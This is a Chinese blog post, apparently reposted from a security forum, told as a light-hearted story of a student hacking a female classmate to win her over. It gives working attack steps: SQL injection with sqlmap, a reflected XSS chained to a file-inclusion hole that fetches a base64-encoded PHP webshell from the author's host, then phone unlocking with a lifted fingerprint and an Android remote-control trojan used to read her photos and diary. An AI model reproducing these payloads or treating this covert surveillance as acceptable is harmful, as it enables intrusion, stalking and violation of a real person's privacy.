本文来自i春秋作者:gh0stkey

-=--=--=--=--=--=--=--=--=--=--=--=-
时间:早上8点02分(洛杉矶时间)
作者:gh0stkey(米斯特安全团队核心)
-=--=--=--=--=--=--=--=--=--=--=--=-

文章前介:

主角:gh0stkey本人(化名:key)、国外留学学生(妹子)

导火线:带有印子的纸条

文章导读:

一张神秘的纸条出现在主角的生活之中,却让主角颠覆了"屌丝"的身份。

纸条模样还原: 因为当时没想到要拍照,就借下网图。

内容简介:

事情是这样的,在一个阳光明媚的早晨,Key开始了老套的生活方式(洗脸刷牙..)上学去了。 ...中间省略上课不听讲的趣事。 只听"叮铃铃"的下课铃,Key跟往常一样走出教室呼吸下新鲜的空气,可是意外的在走廊上发现了一张纸条。

上面的内容大概是一串数字:1001...(大概就是10这两个数字重复的使用) Key饶有兴趣的看了下,飞快的在大脑中找出了两种解决思路:二进制 摩斯电码。

Key再进行思考,发现只有摩斯电码可行(这样与之匹配 1=滴 0=嗒 正好学校最近也教过摩斯电码) 这样再进行一次转换(滴=· 嗒=-) 然后对应图1进行解码,发现结果居然是个中国的手机号。 出于好奇,Key使用了一个手机号位置定位的系统进行了查询:

(位置仅供参考而已。)

Key就在想自己班里是不是有一个就是新疆过来的?(其实就是在YY,是男的还是女的)

二话不说就动手把上次备份下来的同学信息档案调出来:

看到一个叫韩雨的,名字一看,果不其然是个妹子!(到这里Key的"屌丝"气质就显露无疑了)

开始进行人肉搜索,这里Key选择了Google进行搜索,先是搜索了"YuHan"的关键词,其实没有多少用处(名字太多找不到有用信息)

再进行手机号的搜索发现了一个网站:

居然搜索到了这个,进去了网站瞬间给跳转到了主页index.html

有经验的人就知道这个页面能被爬到,说明之前存在越权漏洞。

但是到Key开始玩的时候就给修复了,Key顿时脸上就多了几条黑线。。。

这彻底激发了Key的屌丝之魂,利用了Safe3进行了SQL注入的扫描 结果:

http://****/index.php?shop=17 可能存在SQL注入漏洞

虽然是爆出了可能存在其实使用SQLMAP注入也是可以的: 直接使用正常的语法就注入出来了:

Key看到数据量也是很大的,但并没有去Dump数据而是选择了温柔的方式:--os-shell

可惜的是并没有权限去执行,无奈,只得继续挖掘其他的漏洞。

通过一系列的测试挖到了一个XSS反射(这里的挖掘思路无非就是见参数就使用payload插进去然后看返回的信息进行构造):

不过光一个XSS反射没有什么用,于是Key选择了代码审计这款程序,因为是一款开源的商城程序,很快就可以找到。

Key直接使用Tommsearch快速搜索找到后台一处代码:

<?php
include($_GET['action']);
....

明眼人直接可以看出来,存在文件包含漏洞。 但是只是后台,该怎么办?于是Key就结合了XSS反射漏洞进行:

Key在自己的主机上创建了个文件:1.php内容为:

<?php file_put_contents('key.php',base64_decode('QGV2YWwoJF9QT1NUJiM5MTtrZXkmIzkzOyk7Pz4=')); ?>

然后构建了xss反射的payload:

<script>href.location="/admin/ad.php?action=http://****.top/1.php"</script>

直接跳转到文件包含那个URL中然后包含Key的1.php文件这样就可以创建key.php木马文件了(一句话木马 也就是1.php的代码意思)。

流程图:

这边利用的商品评价,诱惑下后台的人。

OK这次渗透就到这里,Key顺利的拿下了Webshell:

之后Key得到了妹纸的买卖信息,其中步伐有胸罩购买!!(Key这时鼻血已经流出来了啦)

OK获取这些之后,Key整理了下文本就关机睡觉等待第二天去撩那个妹子(韩雨)。

。。。

第二天来到的如此之快,再去学校的路上Key碰见了上学以来对自己很照顾的同桌,并且知道了韩雨的模样(喷血喷血,好漂酿的)

走进了班级,Key东张西望,只见"清爽的头发,清秀的脸皮,清澈的眼眸",没错就是韩雨!

Key以不是很流利的英语跟韩雨打招呼,得来的却是:“我知道你是中国人,我们可以用中国话沟通的。”

只听“啪啪啪啪”的响声,Key被打脸了,很疼

。。。 经过跟妹子的交流,他们的关系似乎在慢慢的拉近,于是相约去吃牛排(这期间细节就不多讲,就是撩妹子),由于有事情,妹子先走了。 Key作为一名职业的“屌丝”!随身携带胶带纸是很有必要的,于是利用胶带纸小心翼翼的采集了西餐刀上的指纹:

顺利的保留下来之后,下面的才是有趣的。 。。。 又是过了几天,Key由于迟到被留下来罚打扫教室,发现韩雨的抽屉手机没带回去。Key试着打开手机可是有密码,也不知道,懒得用知道的信息做成密码攻击字典了,于是就用之前收集好的指纹信息顺利的解锁了手机,并且打开自己的网盘,种下了以前玩的安卓远控,安然无恙的放回了抽屉中。

。。。 终于,利用木马,Key有了妹子的正脸照:

Key也偷看了她的日记:

9.12号,今天有点累,闺蜜们都有男朋友安慰,突然觉得有男朋友真好。

这条日记 Key仿佛看到了希望!!

于是Key直接干脆的来了条:
第二天,Key直接当众表白(这里当然不能少了玫瑰花),结果是成功了!

就这样Key成功的逆袭了“屌丝”的身份。

原文地址:http://bbs.ichunqiu.com/thread-12136-1-1.html?from=paper


Paper 本文由 Seebug Paper 发布,如需转载请注明来源。本文地址:http://paper.seebug.org/48/